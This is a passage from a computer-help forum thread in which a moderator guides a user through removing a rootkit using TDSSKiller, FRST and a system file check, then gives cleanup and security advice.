23:29:47.0633 0x18f4  sbp2port ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0633 0x18f4  sbp2port ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0633 0x18f4  SCDEmu ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0633 0x18f4  SCDEmu ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0643 0x18f4  scfilter ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0643 0x18f4  scfilter ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0643 0x18f4  secdrv ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0643 0x18f4  secdrv ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0643 0x18f4  Serenum ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0643 0x18f4  Serenum ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0643 0x18f4  Serial ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0643 0x18f4  Serial ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0654 0x18f4  sermouse ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0654 0x18f4  sermouse ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0658 0x18f4  sffdisk ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0658 0x18f4  sffdisk ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0659 0x18f4  sffp_mmc ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0659 0x18f4  sffp_mmc ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0663 0x18f4  sffp_sd ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0664 0x18f4  sffp_sd ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0667 0x18f4  sfloppy ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0667 0x18f4  sfloppy ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0669 0x18f4  SiSRaid2 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0669 0x18f4  SiSRaid2 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0672 0x18f4  SiSRaid4 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0672 0x18f4  SiSRaid4 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0674 0x18f4  Smb ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0674 0x18f4  Smb ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0675 0x18f4  spldr ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0675 0x18f4  spldr ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0675 0x18f4  srv ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0675 0x18f4  srv ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0675 0x18f4  srv2 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0675 0x18f4  srv2 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0675 0x18f4  srvnet ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0675 0x18f4  srvnet ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0675 0x18f4  stexstor ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0675 0x18f4  stexstor ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0685 0x18f4  swenum ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0685 0x18f4  swenum ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0685 0x18f4  syshost32 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0685 0x18f4  syshost32 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0685 0x18f4  Tcpip ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0685 0x18f4  Tcpip ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0695 0x18f4  TCPIP6 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0695 0x18f4  TCPIP6 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0695 0x18f4  tcpipreg ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0695 0x18f4  tcpipreg ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0695 0x18f4  TDPIPE ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0695 0x18f4  TDPIPE ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0705 0x18f4  TDTCP ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0705 0x18f4  TDTCP ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0705 0x18f4  tdx ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0705 0x18f4  tdx ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0705 0x18f4  TermDD ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0705 0x18f4  TermDD ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0705 0x18f4  tssecsrv ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0705 0x18f4  tssecsrv ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0715 0x18f4  tunnel ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0715 0x18f4  tunnel ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0715 0x18f4  uagp35 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0715 0x18f4  uagp35 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0715 0x18f4  udfs ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0715 0x18f4  udfs ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0715 0x18f4  uliagpkx ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0715 0x18f4  uliagpkx ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0725 0x18f4  umbus ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0725 0x18f4  umbus ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0727 0x18f4  UmPass ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0727 0x18f4  UmPass ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0730 0x18f4  USBAAPL64 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0730 0x18f4  USBAAPL64 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0731 0x18f4  usbaudio ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0731 0x18f4  usbaudio ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0735 0x18f4  usbccgp ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0735 0x18f4  usbccgp ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0737 0x18f4  usbcir ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0737 0x18f4  usbcir ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0747 0x18f4  usbehci ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0747 0x18f4  usbehci ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0747 0x18f4  usbhub ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0747 0x18f4  usbhub ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0747 0x18f4  usbohci ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0747 0x18f4  usbohci ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0747 0x18f4  usbprint ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0747 0x18f4  usbprint ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0747 0x18f4  USBSTOR ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0747 0x18f4  USBSTOR ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0757 0x18f4  usbuhci ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0757 0x18f4  usbuhci ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0757 0x18f4  usbvideo ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0757 0x18f4  usbvideo ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0757 0x18f4  vdrvroot ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0757 0x18f4  vdrvroot ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0767 0x18f4  vga ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0767 0x18f4  vga ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0767 0x18f4  VgaSave ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0767 0x18f4  VgaSave ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0787 0x18f4  vhdmp ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0787 0x18f4  vhdmp ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0787 0x18f4  viaide ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0787 0x18f4  viaide ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0787 0x18f4  volmgr ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0787 0x18f4  volmgr ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0787 0x18f4  volmgrx ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0787 0x18f4  volmgrx ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0798 0x18f4  volsnap ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0798 0x18f4  volsnap ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0800 0x18f4  vsmraid ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0800 0x18f4  vsmraid ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0802 0x18f4  vwifibus ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0802 0x18f4  vwifibus ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0804 0x18f4  vwififlt ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0804 0x18f4  vwififlt ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0806 0x18f4  WacomPen ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0807 0x18f4  WacomPen ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0811 0x18f4  WANARP ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0811 0x18f4  WANARP ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0812 0x18f4  Wanarpv6 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0812 0x18f4  Wanarpv6 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0815 0x18f4  Wd ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0815 0x18f4  Wd ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0817 0x18f4  Wdf01000 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0817 0x18f4  Wdf01000 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0819 0x18f4  WfpLwf ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0819 0x18f4  WfpLwf ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0819 0x18f4  WIMMount ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0819 0x18f4  WIMMount ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0819 0x18f4  WinUsb ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0819 0x18f4  WinUsb ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0819 0x18f4  WmiAcpi ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0819 0x18f4  WmiAcpi ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0819 0x18f4  ws2ifsl ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0819 0x18f4  ws2ifsl ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0829 0x18f4  wStLib64 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0829 0x18f4  wStLib64 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0829 0x18f4  WudfPf ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0829 0x18f4  WudfPf ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0829 0x18f4  WUDFRd ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0829 0x18f4  WUDFRd ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0829 0x18f4  xusb21 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0829 0x18f4  xusb21 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0839 0x18f4  ZSMC301b ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0839 0x18f4  ZSMC301b ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0839 0x18f4  MusicManager ( UnsignedFile.Multi.Generic ) - skipped by user
23:29:47.0839 0x18f4  MusicManager ( UnsignedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0839 0x18f4  Hyperdesktop ( UnsignedFile.Multi.Generic ) - skipped by user
23:29:47.0839 0x18f4  Hyperdesktop ( UnsignedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0839 0x18f4  SpybotPostWindows10UpgradeReInstall ( UnsignedFile.Multi.Generic ) - skipped by user
23:29:47.0849 0x18f4  SpybotPostWindows10UpgradeReInstall ( UnsignedFile.Multi.Generic ) - User select action: Skip 

  • 0

#5
Joe Hunter

Joe Hunter

    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

Log from FRST fix

Attached Files


Edited by Joe Hunter, 28 March 2016 - 05:19 PM.

  • 0

#6
Joe Hunter

Joe Hunter

    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

The last log from ADW cleaner. Hope these help and again thanks.

Attached Files


  • 0

#7
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts

OK run TDSSKiller again pleas and when you see this entry select delete :

23:29:46.0551 0x18f4 8299bf85dcfa9606 ( Rootkit.Win32.Necurs.gen )

Then run a fresh FRST scan and let me know how the computer is behaving


  • 0

#8
Joe Hunter

Joe Hunter

    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

Thanks for checking back in. I've run the TDSSKiller scan, "delete" the Rootkit, and just run a FRST scan. Computer seems to be running smoother now. I've attached the FRST scan log just in case, is there a sure fire way to check i've got rid of the rootkit?

 

Thanks a lot.

Attached Files

  • Attached File  FRST.txt   42.07KB   146 downloads

  • 0

#9
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
One final bit of repair and you should be good to go

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:
 

cmd: sfc /scanfile=C:\Windows\SysWOW64\svchost.exe


Save this as fixlist.txt, in the same location as FRST.exe
FRSTfix.JPG
Run FRST and press Fix
On completion a log will be generated please post that
  • 0

#10
Joe Hunter

Joe Hunter

    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

This is the log:

 

Fix result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by Joe (2016-03-29 15:49:17) Run:3
Running from C:\Users\Joe\Downloads
Loaded Profiles: Joe (Available Profiles: Joe)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
cmd: sfc /scanfile=C:\Windows\SysWOW64\svchost.exe
*****************
 
 
=========  sfc /scanfile=C:\Windows\SysWOW64\svchost.exe =========
 
 
 
 
Windows Resource Protection found corrupt files and successfully repaired 
 
them. Details are included in the CBS.Log windir\Logs\CBS\CBS.log. For 
 
example C:\Windows\Logs\CBS\CBS.log
 
 
========= End of CMD: =========
 
 
==== End of Fixlog 15:49:21 ====

  • 0

Advertisements


#11
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Excellent ... Any further problems before I remove all my tools and tidy you up ?
  • 0

#12
Joe Hunter

Joe Hunter

    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts
No other problems, thanks for the help.
  • 0

#13
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Subject to no further problems :)

I will remove my tools now and give some recommendations, but, I would like you to run for 24 hours or so and come back if you have any problems

Now the best part of the day ----- Your log now appears clean :thumbsup:

A good workman always cleans up after himself so..The following will implement some cleanup procedures as well as reset System Restore points:

Remove tools

Download and run Delfix
Select the options as shown
delfix.JPG


: Keep Java Updated :

WARNING: Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java
See this article

I would recommend that you completely uninstall Java unless you need it to run an important software.
In that instance I would recommend that you disable Java in your browsers until you need it for that software and then enable it. (See How to diasble Java in your web browser and How to unplug Java from the browser)

If you do need to keep Java then download JavaRa
Run the programme and select Remove Java Runtime. Uninstall all versions of Java present
Once done then run it again and select Update Java runtime > Download and install Latest version
javara.JPG


Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:

CryptoPrevent install this programme to lock down and prevent crypto ransome ware

CryptoPrevent.JPG

Malwarebytes

Update and run weekly to keep your system clean

Unchecky

Click on the link above to be taken to Unchecky.com
click the very large Download button.
click Save
Click Open folder
Right click on the Unchecky_setup and choose to Run as Administrator
Once open click the Install button.
Then click on Finish
Unchecky is now installed and will help you keep unwanted check boxes unchecked, this is a fire and forget programme ;)

It is critical to have both a firewall and anti virus to protect your system and to keep them updated.

To learn more about how to protect yourself while on the internet read this little guide Best security practices Keep safe :wave:
  • 0

#14
Joe Hunter

Joe Hunter

    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

Thanks for all your help, i shall check back in tomorrow evening/night time and hopefully all will be solved!


  • 0

#15
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts

:)


  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP